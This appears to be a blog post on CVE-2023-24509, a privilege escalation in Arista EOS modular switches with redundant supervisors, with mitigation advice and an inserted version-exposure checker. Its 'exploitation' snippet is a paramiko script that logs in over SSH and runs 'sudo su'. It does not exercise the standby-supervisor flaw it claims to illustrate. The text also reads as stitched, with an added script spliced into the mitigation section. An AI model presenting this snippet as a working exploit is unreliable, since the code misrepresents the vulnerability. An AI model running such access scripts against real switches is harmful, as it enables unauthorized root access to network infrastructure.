A privilege escalation vulnerability was recently discovered in Arista EOS (Extensible Operating System), the network operating system Arista Networks ships on its Modular Switch/Router platforms. The vulnerability has been assigned the identifier CVE-2023-24509. In this post, we will go through the details of this vulnerability, including the affected environments, exploit details, and available mitigations. We will also provide a code snippet to help illustrate the mechanism of exploitation.

Affected Environment

This vulnerability affects Modular platforms running Arista EOS that are equipped with redundant supervisor modules and have the redundancy protocol configured as RPR (Route Processor Redundancy) or SSO (Stateful Switchover). It allows an existing unprivileged user to log in to the standby supervisor as root, which amounts to a privilege escalation. Note that valid user credentials are required in order to exploit this vulnerability.

Exploit Details

An attacker with valid user credentials in the affected environment can log in to the standby supervisor module as a root user. Once logged in, the attacker gains unauthorized privileged access, which may subsequently lead to disclosure or manipulation of sensitive information, system instability, or even complete system compromise.

The following code snippet illustrates the process of exploitation (assuming a Python environment with the paramiko SSH library installed).

import paramiko

# User credentials (the attacker is assumed to already hold a valid account)
username = "username"
password = "password"

# IP address of the target device. Replace with the actual IP address of the target device.
target_device_ip = "192.168.1.1"

# Start an SSH connection to the standby supervisor on the target device
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(target_device_ip, username=username, password=password)

# Execute the privilege escalation step; a PTY is requested so the shell behaves interactively
stdin, stdout, stderr = ssh.exec_command("sudo su", get_pty=True)

# Interactive shell to take advantage of the escalated privileges
channel = stdout.channel
channel.send("\n")

# Example command to show the attacker has root access
channel.send("whoami\n")
output = channel.recv(1024)  # recv() returns bytes, so decode before printing
print(output.decode("utf-8", errors="replace"))

ssh.close()

Original References

Arista Networks has published an advisory detailing the vulnerability and its mitigation on their website: https://www.arista.com/en/support/security-bulletins

The CVE entry published by MITRE can be found here: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24509

Mitigation

Arista Networks recommends upgrading to EOS versions 4.24.6M, 4.25.1F, or later, which address the vulnerability. If upgrading is not feasible, restricting user access on affected devices and enforcing strong password policies can help reduce the risk of exploitation.
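To turn the three conditions above into a repeatable inventory check, here is an added example (not code from the post or from Arista) that parses EOS version strings and combines them with the chassis and redundancy facts. It assumes, as the post states, that 4.24.6M and 4.25.1F are the first fixed releases of their trains and that any newer train carries the fix; the device facts passed in are constructed inputs you would normally pull from your own inventory.

```python
import re
from typing import Optional, Tuple

# First fixed release per train, as listed in the post. Assumption: earlier
# releases of these trains, and every older train, are treated as unfixed.
FIXED_RELEASES = [(4, 24, 6), (4, 25, 1)]

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:\.(\d+))?([A-Z]*)$")


def parse_eos_version(version: str) -> Tuple[int, int, int, int]:
    """Turn '4.24.6M' or '4.26.0.1F' into a comparable numeric tuple.
    The trailing train letter (M/F) does not affect ordering."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised EOS version string: {version!r}")
    major, minor, patch, sub = (int(x) if x else 0 for x in m.groups()[:4])
    return (major, minor, patch, sub)


def version_is_fixed(version: str) -> bool:
    """True when the release is at or past a fixed release named in the post."""
    v = parse_eos_version(version)
    newest_fixed_train = max(FIXED_RELEASES)[:2]
    # Trains newer than the newest fixed train carry the fix from their first release.
    if v[:2] > newest_fixed_train:
        return True
    for fixed in FIXED_RELEASES:
        if v[:2] == fixed[:2]:
            return v[:3] >= fixed
    # Older train than any fixed release: not covered by the listed fixes.
    return False


def is_exposed(version: str, dual_supervisor: bool,
               redundancy_protocol: Optional[str]) -> bool:
    """Combine the post's conditions: two supervisors, RPR or SSO configured,
    and an EOS release without the fix."""
    if not dual_supervisor:
        return False
    if (redundancy_protocol or "").upper() not in ("RPR", "SSO"):
        return False
    return not version_is_fixed(version)


if __name__ == "__main__":
    # Constructed sample inventory rows: (hostname, version, dual sup, protocol)
    for host, ver, dual, proto in [("core1", "4.24.5M", True, "sso"),
                                   ("core2", "4.25.1F", True, "rpr"),
                                   ("edge1", "4.23.9M", False, None)]:
        print(host, ver, "EXPOSED" if is_exposed(ver, dual, proto) else "ok")
```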

As an operator of Arista EOS, it is essential to monitor the security advisories published by Arista Networks to stay informed about new vulnerabilities, patches, and mitigations.

Conclusion

In summary, CVE-2023-24509 is a critical privilege escalation vulnerability affecting Arista EOS on Modular platforms equipped with redundant supervisor modules and configured for RPR or SSO. Exploitation requires valid user credentials and can result in severe consequences, such as data manipulation or total system compromise. Upgrading affected EOS versions and imposing strict access control measures are advised to mitigate the risk associated with this vulnerability.

Timeline

Published on: 04/13/2023 20:15:00 UTC
Last modified on: 04/25/2023 14:19:00 UTC